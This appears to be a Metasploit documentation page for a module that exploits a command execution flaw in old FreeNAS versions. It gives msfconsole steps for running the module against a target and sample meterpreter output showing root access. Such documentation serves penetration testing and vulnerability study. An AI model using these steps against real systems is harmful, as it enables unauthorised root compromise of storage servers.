ContextQMD
Back to Metasploit Framework

Freenas Exec Raw

documentation/modules/exploit/multi/http/freenas_exec_raw.md

6.4.131832 B
Original Source

Vulnerable Application

This module exploits an arbitrary command execution flaw in FreeNAS 0.7.2 < rev.5543. When passing a specially formatted URL to the exec_raw.php page, an attacker may be able to execute arbitrary commands.

NOTE: This module works best with php/meterpreter payloads.

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/freenas_exec_raw
  4. Do: set rhost [ip]
  5. Do: run
  6. You should get a shell.

Options

Scenarios

Unknown

meterpreter > sysinfo
Computer: freenas.local
OS      : FreeBSD freenas.local 7.3-RELEASE-p2 FreeBSD 7.3-RELEASE-p2 #0: Sat Jul 31 12:22:04 CEST 2010     [email protected]:/usr/obj/freenas/usr/src/sys/FREENAS-i386 i386
meterpreter > getuid
Server username: root (0)
meterpreter >